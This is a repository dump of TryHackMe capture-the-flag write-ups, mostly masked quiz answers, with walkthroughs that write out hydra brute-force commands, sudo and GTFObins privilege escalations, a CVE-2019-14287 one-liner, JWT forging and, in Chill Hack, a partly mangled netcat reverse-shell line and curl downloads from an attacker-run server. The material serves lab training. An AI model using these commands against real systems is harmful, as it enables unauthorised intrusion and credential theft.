7 |
8 | - How many scripts do you see in the /home/thegrinch/scripts folder?
9 |
10 | - `*`
11 |
12 | - What are the five characters following $6$G in pepper's password hash?
13 |
14 | - `*****`
15 |
16 | - What is the content of the flag.txt file on the Grinch's user’s desktop?
17 |
18 | - `***************************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-15-The_Grinchs_day_off/README.md:
--------------------------------------------------------------------------------
1 | # Day 15 - The Grinchs day off
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-16-Ransomware_Madness/README.md:
--------------------------------------------------------------------------------
1 | # Day 16 - Ransomware Madness
2 |
3 | - !!! ВАЖНЫЙ !!!
4 |
5 | No answer needed
6 |
7 | - What is the operator's username?
8 |
9 | - `************`
10 |
11 | - What social media platform is the username associated with?
12 |
13 | - `*******`
14 |
15 | - What is the cryptographic identifier associated with the operator?
16 |
17 | - `********************************`
18 |
19 | - What platform is the cryptographic identifier associated with?
20 |
21 | - `*********`
22 |
23 | - What is the bitcoin address of the operator?
24 |
25 | - `**********************************`
26 |
27 | - What platform does the operator leak the bitcoin address on?
28 |
29 | - `******`
30 |
31 | - What is the operator's personal email?
32 |
33 | - `*****************`
34 |
35 | - What is the operator's real name?
36 |
37 | - `***********`
38 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-17-Elf_Leaks/README.md:
--------------------------------------------------------------------------------
1 | # Day 17 - Elf Leaks
2 |
3 |
4 | - What is the name of the S3 Bucket used to host the HR Website announcement?
5 |
6 | - `******.*******************.***`
7 |
8 | - What is the message left in the flag.txt object from that bucket?
9 |
10 | - `**** **** ** *** **** ***** **** **** *** ***** ** ** **** ** *****`
11 |
12 | - What other file in that bucket looks interesting to you?
13 |
14 | - `*********.***`
15 |
16 | - What is the AWS Access Key ID in that file?
17 |
18 | - `********************`
19 |
20 | - What is the AWS Account ID that access-key works for?
21 |
22 | - `************`
23 |
24 | - What is the Username for that access-key?
25 |
26 | - `***********.***`
27 |
28 | - There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?
29 |
30 | - `*********`
31 |
32 | - What is the database password stored in Secrets Manager?
33 |
34 | - `***********`
35 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-18-Playing_With_Containers/README.md:
--------------------------------------------------------------------------------
1 | # Day 18 - Playing With Containers
2 |
3 | - What command will list container images stored in your local container registry?
4 |
5 | - `****** ******`
6 |
7 | - What command will allow you to save a docker image as a tar archive?
8 |
9 | - `****** ****`
10 |
11 | - What is the name of the file (including file extension) for the configuration, repository tags, and layer hash values stored in a container image?
12 |
13 | - `********.****`
14 |
15 | - What is the token value you found for the bonus challenge?
16 |
17 | - `********************************`
18 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-19-Something_Phishy_Is_Going_On/README.md:
--------------------------------------------------------------------------------
1 | # Day 19 - Something Phishy Is Going On
2 |
3 | - Who was the email sent to? (Answer is the email address)
4 |
5 | - `******************.***`
6 |
7 | - Phishing emails use similar domains of their targets to increase the likelihood the recipient will be tricked into interacting with the email. Who does it say the email was from? (Answer is the email address)
8 |
9 | - `********************.****`
10 |
11 | - Sometimes phishing emails have a different reply-to email address. If this email was replied to, what email address will receive the email response?
12 |
13 | - `****************.******`
14 |
15 | - Less sophisticated phishing emails will have typos. What is the misspelled word?
16 |
17 | - `*******`
18 |
19 | - The email contains a link that will redirect the recipient to a fraudulent website in an effort to collect credentials. What is the link to the credential harvesting website?
20 |
21 | - `*****://**********.******/***/*******/`
22 |
23 | - View the email source code. There is an unusual email header. What is the header and its value?
24 |
25 | - `*************: ****`
26 |
27 | - You received other reports of phishing attempts from other colleagues. Some of the other emails contained attachments. Open attachment.txt. What is the name of the attachment?
28 |
29 | - `***************************.***`
30 |
31 | - What is the flag in the PDF file?
32 |
33 | - `***{***************************}`
34 |
35 | If you want to learn more about phishing, check out the "Phishing" module on TryHackMe.
36 |
37 | No answer needed
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-20-What_s_the_Worst_That_Could_Happen/README.md:
--------------------------------------------------------------------------------
1 | # Day 20 - What's the Worst That Could Happen?
2 |
3 | - Open the terminal and navigate to the file on the desktop named 'testfile'. Using the 'strings' command, check the strings in the file. There is only a single line of output to the 'strings' command. What is the output?
4 |
5 | - `**************************}*****************************************`
6 |
7 | - Check the file type of 'testfile' using the 'file' command. What is the file type?
8 |
9 | - `***** ***** **** *****`
10 |
11 | - Calculate the file's hash and search for it on VirusTotal. When was the file first seen in the wild?
12 |
13 | - `********** **:**:**`
14 |
15 | - On VirusTotal's detection tab, what is the classification assigned to the file by Microsoft?
16 |
17 | - `*****:***/***************`
18 |
19 | - Go to this link to learn more about this file and what it is used for. What were the first two names of this file?
20 |
21 | - `*******.*** ** ************.***`
22 |
23 | - The file has 68 characters in the start known as the known string. It can be appended with whitespace characters upto a limited number of characters. What is the maximum number of total characters that can be in the file?
24 |
25 | - `***`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-21-Needles_In_Computer_Stacks/README.md:
--------------------------------------------------------------------------------
1 | # Day 21 - Needles In Computer Stacks
2 |
3 | - We changed the text in the string $a as shown in the eicaryara rule we wrote, from X5O to X50, that is, we replaced the letter O with the number 0. The condition for the Yara rule is $a and $b and $c and $d. If we are to only make a change to the first boolean operator in this condition, what boolean operator shall we replace the 'and' with, in order for the rule to still hit the file?
4 |
5 | - `**`
6 |
7 | - What option is used in the Yara command in order to list down the metadata of the rules that are a hit to a file?
8 |
9 | - `**`
10 |
11 | - What section contains information about the author of the Yara rule?
12 |
13 | - `********`
14 |
15 | - What option is used to print only rules that did not hit?
16 |
17 | - `**`
18 |
19 | - Change the Yara rule value for the $a string to X50. Rerun the command, but this time with the -c option. What is the result?
20 |
21 | - `*`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-22-How_It_Happened/README.md:
--------------------------------------------------------------------------------
1 | # Day 22 - How It Happened
2 |
3 | - What is the username (email address of Grinch Enterprises) from the decoded script?
4 |
5 | - `******.***********.**********.***`
6 |
7 | - What is the mailbox password you found?
8 |
9 | - `*******************`
10 |
11 | - What is the subject of the email?
12 |
13 | - `********* ********`
14 |
15 | - What port is the script using to exfiltrate data from the North Pole?
16 |
17 | - `***`
18 |
19 | - What is the flag hidden found in the document that Grinch Enterprises left behind? (Hint: use the following command oledump.py -s {stream number} -d, the answer will be in the caption).
20 |
21 | - `********************`
22 |
23 | - There is still a second flag somewhere... can you find it on the machine?
24 |
25 | - `*********************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-23-PowershELlF_Magic/README.md:
--------------------------------------------------------------------------------
1 | # Day 23 - PowershELlF Magic
2 |
3 | - What command was executed as Elf McNealy to add a new user to the machine?
4 |
5 | - `****************`
6 |
7 | - What user executed the PowerShell file to send the password.txt file from the administrator's desktop to a remote server?
8 |
9 | - `*****`
10 |
11 | - What was the IP address of the remote server? What was the port used for the remote connection? (format: IP,Port)
12 |
13 | - `**.**.***.**,****`
14 |
15 | - What was the encryption key used to encrypt the contents of the text file sent to the remote server?
16 |
17 | - `********************************`
18 |
19 | - What application was used to delete the password.txt file?
20 |
21 | - `*******.***`
22 |
23 | - What is the date and timestamp the logs show that password.txt was deleted? (format: MM/DD/YYYY H:MM:SS PM)
24 |
25 | - `**/**/**** *:**:** **`
26 |
27 | - What were the contents of the deleted password.txt file?
28 |
29 | - `******* *******: ***************************`
30 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-24-Learning_From_The_Grinch/README.md:
--------------------------------------------------------------------------------
1 | # Day 24 - Learning From The Grinch
2 |
3 | - What is the username of the other user on the system?
4 |
5 | - `*****`
6 |
7 | - What is the NTLM hash of this user?
8 |
9 | - `********************************`
10 |
11 | - What is the password for this user?
12 |
13 | - `**********`
14 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/README.md:
--------------------------------------------------------------------------------
1 | # Advent of Cyber 2021 🎄🎅
2 |
3 | ## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)
4 |
5 |
6 | 
7 |
8 | For this year I didn't provide my solution to the challenges since there are ready amazing YT videos. Thanks THM :)
9 |
10 | 
11 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/aoc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2021/aoc.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/aoc2021.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2021/aoc2021.png
--------------------------------------------------------------------------------
/Agent-Sudo/Alien_autospy.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/Alien_autospy.jpg
--------------------------------------------------------------------------------
/Agent-Sudo/README.md:
--------------------------------------------------------------------------------
1 | # Agent Sudo
2 |
3 |
4 | - Deploy the machine
5 |
6 | no answer needed
7 |
8 | - How many open ports?
9 |
10 | - `nmap `
11 | - `3`
12 |
13 | - How you redirect yourself to a secret page?
14 |
15 | - `user-agent`
16 |
17 | - What is the agent name?
18 |
19 | - Let's try changing the user-agent.
20 | - `curl -A "A" -L `. Mmmmh...
21 | - `curl -A "C" -L `. Got it.
22 | - `chris`
23 |
24 | - FTP password
25 |
26 | - `hydra -l chris -P /usr/share/wordlists/rockyou.txt -vV -t 4 ftp`
27 | - `crystal`
28 |
29 | - steg password
30 |
31 | - `ftp `
32 | - Enter username `chris` and password `crystal`.
33 | - `mget *`
34 | - By `ToAgentJ.txt` I can understand there is a pic that isn't a photo actually.
35 | - In fact, `binwalk -e cutie.png` extracts useful data.
36 | - `cd _cutie.png.extracted`
37 | - `zip2john 8702.zip > zip.hash`
38 | - `john zip.hash` and we get the password
39 | - `7z e zip.hash`, enter `Y` and the password.
40 | - `cat ToAgentR.txt`
41 | - Inserting that weird string into CyberChef (from Base64) we get `Area51`.
42 | - `Area51`
43 |
44 | - Zip file password
45 |
46 | - `alien`
47 |
48 | - Who is the other agent (in full name)?
49 |
50 | - `steghide info cute-alien.jpg`, enter `y` and the passphrase (`Area51`).
51 | - There is a message.txt inside
52 | - `steghide extract -sf cute-alien.jpg`
53 | - `james`
54 |
55 | - SSH password
56 |
57 | - `hackerrules!`
58 |
59 | - What is the user flag?
60 |
61 | - `ssh james@` and then enter the password.
62 | - `cat user_flag.txt`
63 | - `b0**975e8******041**********13c7`
64 |
65 | - What is the incident of the photo called?
66 |
67 | - Enable ssh on your machine
68 | - `scp Alien_autospy.jpg YOUR-USER-HERE@YOUR-IP-HERE:Alien_autospy.jpg`
69 | - Search that photo with Google Reverse Image.
70 | - `Roswell Alien Autopsy`
71 |
72 | - CVE number for the escalation (Format: CVE-xxxx-xxxx)
73 |
74 | - `sudo -l`
75 | - `CVE-2019-14287` ([exploit-db](https://www.exploit-db.com/))
76 |
77 | - What is the root flag?
78 |
79 | - `sudo -u \#$((0xffffffff)) /bin/bash`
80 | - `id`
81 | - `cat /root/root.txt`
82 | - `b53**2f55b57******3341**********`
83 | - `Deskel`
84 |
85 |
86 |
87 |
--------------------------------------------------------------------------------
/Agent-Sudo/To_agentJ.txt:
--------------------------------------------------------------------------------
1 | Dear agent J,
2 |
3 | All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
4 |
5 | From,
6 | Agent C
7 |
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/365:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/_cutie.png.extracted/365
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/365.zlib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/_cutie.png.extracted/365.zlib
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/8702.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/_cutie.png.extracted/8702.zip
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/To_agentR.txt:
--------------------------------------------------------------------------------
1 | Agent C,
2 |
3 | We need to send the picture to 'QXJlYTUx' as soon as possible!
4 |
5 | By,
6 | Agent R
7 |
--------------------------------------------------------------------------------
/Agent-Sudo/_cutie.png.extracted/zip.hash:
--------------------------------------------------------------------------------
1 | 8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip
2 |
--------------------------------------------------------------------------------
/Agent-Sudo/cute-alien.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/cute-alien.jpg
--------------------------------------------------------------------------------
/Agent-Sudo/cutie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Agent-Sudo/cutie.png
--------------------------------------------------------------------------------
/Agent-Sudo/message.txt:
--------------------------------------------------------------------------------
1 | Hi james,
2 |
3 | Glad you find this message. Your login password is hackerrules!
4 |
5 | Don't ask me why the password look cheesy, ask agent R who set this password for you.
6 |
7 | Your buddy,
8 | chris
9 |
--------------------------------------------------------------------------------
/Anonymous/README.md:
--------------------------------------------------------------------------------
1 | # Anonymous
2 |
3 | - Enumerate the machine. How many ports are open?
4 |
5 | - `scilla port -target `
6 | - `*`
7 |
8 | - What service is running on port 21?
9 |
10 | - `ftp`
11 |
12 | - What service is running on ports 139 and 445?
13 |
14 | - `smb`
15 |
16 | - There's a share on the user's computer. What's it called?
17 |
18 | - `smbclient -L `
19 | - `****`
20 |
21 | - user.txt
22 |
23 | - Connect in anonymous mode via ftp and download everything.
24 | - We can write `clean.sh`, so add a reverse shell.
25 | - Fire up a shell and cat the flag.
26 | - `**********************`
27 |
28 | - root.txt
29 |
30 | - `sudo -l`
31 | - `find / -user root -perm -u=s 2>/dev/null`
32 | - `/usr/bin/env`
33 | - `env /bin/sh -p`
34 | - `cat /root/root.txt`
35 | - `*******************************`
36 |
--------------------------------------------------------------------------------
/Authenticate/README.md:
--------------------------------------------------------------------------------
1 | # Authenticate
2 |
3 | - Deploy the VM
4 |
5 | no answer needed
6 |
7 | - What is the flag you found after logging as Jack?
8 |
9 | - `fad9d***********************`
10 |
11 | - Now try the same thing for username Mike
12 |
13 | no answer needed
14 |
15 | - What is the flag you found after logging as Mike?
16 |
17 | - `e1faaa************************`
18 |
19 | - What is the flag that you found in darren's account?
20 |
21 | - `fe860*************************`
22 |
23 | - Now try to do the same trick and see if you can login as arthur.
24 |
25 | no answer needed
26 |
27 | - What is the flag that you found in arthur's account?
28 |
29 | - `d9ac0*************************`
30 |
31 | - Use the same method to find identity of admin user and retrieve the flag?
32 |
33 | - `echo "{"typ":"JWT","alg":"NONE"}" | base64`
34 | - ` echo "{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":0}" | base64`
35 | - `92498*******************`
36 |
37 | - Find the way to get into superadmin ad
38 |
39 | no answer needed
40 |
41 | - What is the password for superadmin account?
42 |
43 | - `abc******`
44 |
45 | - What is the flag you found in superadmin account?
46 |
47 | - `7210*****************`
48 |
49 |
50 |
--------------------------------------------------------------------------------
/Avengers-Blog/README.md:
--------------------------------------------------------------------------------
1 | # Avengers Blog
2 |
3 | - Connect to our network by going to your access page. This is important as you will not be able to access the machine without connecting!
4 |
5 | no answer needed
6 |
7 | - Deploy the machine by clicking the green "Deploy" button on this task and access its webserver.
8 |
9 | no answer needed
10 |
11 | - On the deployed Avengers machine you recently deployed, get the flag1 cookie value.
12 |
13 | - `*****************`
14 |
15 | - Look at the HTTP response headers and obtain flag 2.
16 |
17 | - `headers***************`
18 |
19 | - Look around the FTP share and read flag 3!
20 |
21 | - `nmap -v `
22 | - `ftp `, enter user and password.
23 | - `ls`
24 | - `cd files`
25 | - `get flag3.txt`
26 | - `exit`
27 | - `cat flag3.txt`
28 | - `*************************************`
29 |
30 | - What is the directory that has an Avengers login?
31 |
32 | - `scilla dir -target `
33 | - `/p*****`
34 |
35 | - Log into the Avengers site. View the page source, how many lines of code are there?
36 |
37 | - `***`
38 |
39 | - Read the contents of flag5.txt
40 |
41 | - `rev ../flag5.txt`
42 | - `echo "FLAG" | rev`
43 | - `********************************`
44 |
45 |
46 |
--------------------------------------------------------------------------------
/Baron-Samedit/README.md:
--------------------------------------------------------------------------------
1 | # Baron Samedit
2 |
3 | - Deployed!
4 |
5 | no answer needed
6 |
7 | - After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)?
8 |
9 | - `ssh tryhackme@` and enter the password `tryhackme`
10 | - `cd Exploit`
11 | - `make`
12 | - `sudo-h****************`
13 |
14 | - Run the exploit! You should now have a root shell -- what is the flag in /root/flag.txt?
15 |
16 | - `cat /etc/os-release*`
17 | - `./sudo-h**************** 0`
18 | - `cd /root`
19 | - `cat flag.txt`
20 | - `THM{********************************}`
21 |
--------------------------------------------------------------------------------
/Bash-Scripting/README.md:
--------------------------------------------------------------------------------
1 | # Bash Scripting
2 |
3 | - Are you ready to go!
4 |
5 | no answer needed
6 |
7 | - What piece of code can we insert at the start of a line to comment out our code?
8 |
9 | - `#`
10 |
11 | - What will the following script output to the screen, echo “BishBashBosh”
12 |
13 | - `BishBashBosh`
14 |
15 | - What would this code return?
16 |
17 | - `Jammy is 21 years old`
18 |
19 | - How would you print out the city to the screen?
20 |
21 | - `echo $city`
22 |
23 | - How would you print out the country to the screen?
24 |
25 | - `echo $country`
26 |
27 | - How can we get the number of arguments supplied to a script?
28 |
29 | - `$#`
30 |
31 | - How can we get the filename of our current script(aka our first argument)?
32 |
33 | - `$0`
34 |
35 | - How can we get the 4th argument supplied to the script?
36 |
37 | - `$4`
38 |
39 | - If a script asks us for input how can we direct our input into a variable called ‘test’ using “read”
40 |
41 | - `read test`
42 |
43 | - What will the output of “echo $1 $3” if the script was ran with “./script.sh hello hola aloha”
44 |
45 | - `hello aloha`
46 |
47 | - What would be the command to print audi to the screen using indexing.
48 |
49 | - `echo "${cars[1]}"`
50 |
51 | - If we wanted to remove tesla from the array how would we do so?
52 |
53 | - `unset cars[3]`
54 |
55 | - How could we insert a new value called toyota to replace tesla?
56 |
57 | - `cars[3]="toyota"`
58 |
59 | - What is the flag to check if we have read access to a file?
60 |
61 | - `-r`
62 |
63 | - What is the flag to check to see if it's a directory?
64 |
65 | - `-d`
66 |
67 | - Well done!
68 |
69 | no answer needed
70 |
71 |
72 |
73 |
74 |
--------------------------------------------------------------------------------
/Bebop/README.md:
--------------------------------------------------------------------------------
1 | # Bebop
2 |
3 | - Deploy the machine
4 |
5 | no answer needed
6 |
7 | - What is your codename?
8 |
9 | - `pilot`
10 |
11 | - What is the User Flag?
12 |
13 | - `scilla port -target `
14 | - `nmap -p 22,23 -A `
15 | - `telnet 23` as `pilot`
16 | - `ls`
17 | - `cat user.txt`
18 | - `**********************`
19 |
20 | - What is the Root Flag?
21 |
22 | - `sudo -l`
23 | - `(root) NOPASSWD: /usr/local/bin/busybox`
24 | - Visit GTFObins, busybox.
25 | - `sudo busybox sh`
26 | - `id`
27 | - `cat /root/root.txt`
28 | - `**************************`
29 |
30 | - What is the low privilleged user?
31 |
32 | - `pilot`
33 |
34 | - What binary was used to escalate privileges?
35 |
36 | - `busybox`
37 |
38 | - What service was used to gain an initial shell?
39 |
40 | - `telnet`
41 |
42 | - What Operating System does the drone run?
43 |
44 | - `FreeBSD`
45 |
46 | - Watch the video.
47 |
48 | no answer needed
49 |
50 |
51 |
--------------------------------------------------------------------------------
/Bolt/README.md:
--------------------------------------------------------------------------------
1 | # Bolt
2 |
3 | - Start the machine
4 |
5 | no answer needed
6 |
7 | - What port number has a web server with a CMS running?
8 |
9 | - `nmap -sV `
10 | - `8000`
11 |
12 | - What is the username we can find in the CMS?
13 |
14 | - `bolt`
15 |
16 | - What is the password we can find for the username?
17 |
18 | - `*****d*in123`
19 |
20 | - What version of the CMS is installed on the server? (Ex: Name 1.1.1)
21 |
22 | - Login into the page `/bolt` with username and password previously found.
23 | - `Bolt 3.7.1`
24 |
25 | - There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?
26 |
27 | - Search on Google `Bolt RCE Exploit DB`
28 | - `***2*`
29 |
30 | - Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)
31 |
32 | - `msfconsole`
33 | - `search bolt`
34 | - `use *`
35 | - `exploit/unix/******************************`
36 |
37 | - Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
38 |
39 | no answer needed
40 |
41 | - `set LHOST `
42 | - `set LPORT 1234`
43 | - `set RHOST `
44 | - `set USERNAME bolt`
45 | - `set PASSWORD ************`
46 |
47 | - Look for flag.txt inside the machine.
48 |
49 | - `exploit`
50 | - `cat $(find / | grep flag.txt)`
51 | - `THM{***************************}`
52 |
53 |
54 |
55 |
56 |
--------------------------------------------------------------------------------
/Bounty-Hacker/README.md:
--------------------------------------------------------------------------------
1 | # Bounty Hacker
2 |
3 | You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!
4 |
5 | - Deploy the machine.
6 |
7 | no answer needed
8 |
9 | - Find open ports on the machine
10 |
11 | no answer needed
12 |
13 | - `nmap -Pn `
14 |
15 | - Who wrote the task list?
16 |
17 | - `ftp `
18 | - `user`
19 | - `anonymous`
20 | - `recv locks.txt`
21 | - `recv task.txt`
22 | - `cat task.txt`
23 | - `lin`
24 |
25 | - What service can you bruteforce with the text file found?
26 |
27 | - `ssh`
28 |
29 | - What is the users password?
30 |
31 | - `hydra -s 22 -v -V -l 'lin' -P locks.txt -t 8 ssh`
32 | - `RedDr4gonSynd1cat3`
33 |
34 | - user.txt
35 |
36 | - `ssh lin@` and the enter `yes` and the password `RedDr4gonSynd1cat3`
37 | - `ls`
38 | - `cat user.txt`
39 | - `THM{******SyNd1C4T3}`
40 |
41 | - root.txt
42 |
43 | - Type `sudo -l`, enter the password and you can see lin user can run `tar` command with sudo.
44 | - Search on [GTFObins](https://gtfobins.github.io/) `tar`
45 | - Then search for `sudo`
46 | - Found this: `sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`
47 | - Execute this and then `cat /root/root.txt`
48 | - `THM{*************}`
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/Bounty-Hacker/locks.txt:
--------------------------------------------------------------------------------
1 | rEddrAGON
2 | ReDdr4g0nSynd!cat3
3 | Dr@gOn$yn9icat3
4 | R3DDr46ONSYndIC@Te
5 | ReddRA60N
6 | R3dDrag0nSynd1c4te
7 | dRa6oN5YNDiCATE
8 | ReDDR4g0n5ynDIc4te
9 | R3Dr4gOn2044
10 | RedDr4gonSynd1cat3
11 | R3dDRaG0Nsynd1c@T3
12 | Synd1c4teDr@g0n
13 | reddRAg0N
14 | REddRaG0N5yNdIc47e
15 | Dra6oN$yndIC@t3
16 | 4L1mi6H71StHeB357
17 | rEDdragOn$ynd1c473
18 | DrAgoN5ynD1cATE
19 | ReDdrag0n$ynd1cate
20 | Dr@gOn$yND1C4Te
21 | RedDr@gonSyn9ic47e
22 | REd$yNdIc47e
23 | dr@goN5YNd1c@73
24 | rEDdrAGOnSyNDiCat3
25 | r3ddr@g0N
26 | ReDSynd1ca7e
27 |
--------------------------------------------------------------------------------
/Bounty-Hacker/task.txt:
--------------------------------------------------------------------------------
1 | 1.) Protect Vicious.
2 | 2.) Plan for Red Eye pickup on the moon.
3 |
4 | -lin
5 |
--------------------------------------------------------------------------------
/Brooklyn-Nine-Nine/README.md:
--------------------------------------------------------------------------------
1 | # Brooklyn Nine Nine
2 |
3 | - User flag
4 |
5 | - `scilla port -p -1000 `
6 | - Three ports open.
7 | - `ftp ` with username anonymous and no pwd.
8 | - `get note_to_jake.txt`
9 | - `cat note_to_jake.txt`
10 | - Cool.
11 | - `hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh:// -f -VV -t 4`
12 | - `ssh jake@` and enter the pwd.
13 | - `ls -alh`
14 | - `cd ..`
15 | - `cd holt`
16 | - `ls -lah`
17 | - `cat user.txt`
18 | - `********************************`
19 |
20 | - Root flag
21 |
22 | - `sudo -l`
23 | - `sudo less /root/root.txt`
24 | - `********************************`
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/Brute-It/README.md:
--------------------------------------------------------------------------------
1 | # Brute It
2 |
3 | - Deploy the machine
4 |
5 | no answer needed
6 |
7 | - How many ports are open?
8 |
9 | - `nmap -p- ` or
10 | - `scilla port -target `
11 | - `2`
12 |
13 | - What version of SSH is running?
14 |
15 | - `nmap -sS -sV -Pn -p 22 `
16 | - `OpenSSH 7.6p1`
17 |
18 | - What version of Apache is running?
19 |
20 | - `nmap -sS -sV -Pn -p 80 `
21 | - `2.*.**`
22 |
23 | - Which Linux distribution is running?
24 |
25 | - `Ubuntu`
26 |
27 | - What is the hidden directory?
28 |
29 | - `scilla dir -target `
30 | - `/admin`
31 |
32 | - What is the user:password of the admin panel?
33 |
34 | - `hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid" -f`
35 | - `admin:******`
36 |
37 | - What is John's RSA Private Key passphrase?
38 |
39 | - `python2 /usr/share/john/ssh2john.py rsa_priv > hash`
40 | - `john --wordlist=/usr/share/wordlists/rockyou.txt hash`
41 | - `**********`
42 |
43 | - user.txt
44 |
45 | - `chmod 400 hash`
46 | - `ssh john@ -i rsa_priv and enter the passphrase`
47 | - `cat user.txt`
48 | - `THM{***************************}`
49 |
50 | - Web flag
51 |
52 | - `THM{********************}`
53 |
54 | - What is the root's password?
55 |
56 | - `sudo cat /etc/shadow`
57 | - `sudo cat /etc/passwd`
58 | - Copy these two files into your machine
59 | - `unshadow passwd shadow > passwords.txt`
60 | - `john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt`
61 | - `*********`
62 |
63 | - root.txt
64 |
65 | - `sudo -l`
66 | - https://gtfobins.github.io/gtfobins/cat/
67 | - `sudo cat /root/` :)
68 |
69 |
70 |
--------------------------------------------------------------------------------
/Chill-Hack/README.md:
--------------------------------------------------------------------------------
1 | # Chill Hack
2 |
3 | - User Flag
4 |
5 | - `scilla port -target -p -1000`
6 | - `ftp `
7 | - `anonymous`, no password
8 | - `get note.txt`
9 | - `scilla dir -target `
10 | - secret directory found.
11 | - Execute `cat /etc/passwd`. ahahhahahahahahahhaa.
12 | - So, execute `cat&1|nc 1234 >/tmp/f`
15 | - Cool.
16 | - `python3 -c 'import pty;pty.spawn("/bin/bash")'`
17 | - `cd /home`
18 | - `sudo -l`
19 | - `cd apaar`
20 | - `sudo -u apaar /home/apaar/.helpline.sh`
21 | - `/bin/sh` and `/bin/sh`
22 | - `id`
23 | - `cat local.txt`
24 | - `{USER-FLAG: *********************************}`
25 |
26 | - Root Flag
27 |
28 | - `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
29 | - `python3 -m http.server`
30 | - On target `curl :8000/LinEnum.sh > linenum.sh`
31 | - `chmod +x linenum.sh`
32 | - `./linenum.sh`
33 | ~~~
34 | [-] Listening TCP:
35 | Active Internet connections (only servers)
36 | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
37 | tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
38 | tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
39 | tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
40 | tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
41 | ~~~
42 | - On your machine `ssh-keygen`
43 | - `cd ~/.ssh`
44 | - `python3 -m http.server`
45 | - On target `curl :8000/id_rsa.pub > ~/.ssh/authorized_keys`
46 | - `chmod 600 id_rsa`
47 | - `ssh -L 9001:127.0.0.1:9001 -i id_rsa apaar@`
48 | - `cat /var/www/files/index.php`
49 | - Found username and password for MySQL database.
50 | - `mysql -u root -p` and enter the password found.
51 | - `show databases;`
52 | - `use webportal;`
53 | - `show tables;`
54 | - `select * from users;`
55 | - Save those two hashes
56 | - `john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`
57 | - Login into the website at localhost:9001
58 | - Download the image and execute `steghide extract -sf hacker-with-laptop_23-2147985341.jpg`
59 | - `fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip`
60 | - Inspect `source_code.php`
61 | - `echo ******************** | base64 -d`
62 | - `su anurodh` and enter password
63 | - `docker images`
64 | - `docker run -v /root:/mnt -it alpine`
65 | - `cat /mnt/proof.txt`
66 | - `{ROOT-FLAG: ********************************}`
67 |
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/Cyborg/README.md:
--------------------------------------------------------------------------------
1 | # Cyborg
2 |
3 | - Deploy the machine
4 |
